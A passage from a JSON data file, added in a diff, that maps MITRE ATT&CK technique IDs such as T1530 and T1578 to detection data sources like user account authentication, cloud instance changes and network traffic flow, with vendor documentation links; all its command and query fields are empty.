It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1535", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + } + ], + "external_reference": [ + [ + 
"https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ] + ] + }, + { + "technique_id": "T1525", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image creation", + "description": "An image was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "image" + }, + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image modification", + "description": "An image was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "image" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ] + ] + }, + { + "technique_id": "T1538", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information 
about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1530", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage access", + "description": "A cloud storage was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage access", + "description": "A cloud storage was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "cloud storage object" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/s3/", + 
"https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1578", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance stop", + "description": "An instance was stopped.", + "source_data_element": "user", + "relationship": "stopped", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance stop", + "description": "An instance was stopped.", + "source_data_element": "user", + "relationship": "powered off", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "ran", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": 
"instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "redeployed", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "attached", + "target_data_element": "disk/volume" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "detached", + "target_data_element": "disk/volume" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An 
instance was modified.", + "source_data_element": "user", + "relationship": "updated", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "instance" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot creation", + "description": "A snapshot was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "snapshot" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot modification", + "description": "A snapshot was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "snapshot" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot deletion", + "description": "A snapshot 
was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "snapshot" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume creation", + "description": "A volume was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "volume" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume modification", + "description": "A volume was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "volume" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume deletion", + "description": "A volume was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "volume" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + [ + "https://aws.amazon.com/s3/", + 
"https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1526", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service metadata", + "description": "Data and information that describe a cloud service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "cloud service" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service enumeration", + "description": "A cloud service was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "cloud service" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com", + "https://azure.microsoft.com/en-us/services/" + ] + ] + }, + { + "technique_id": "T1505", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1498", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": 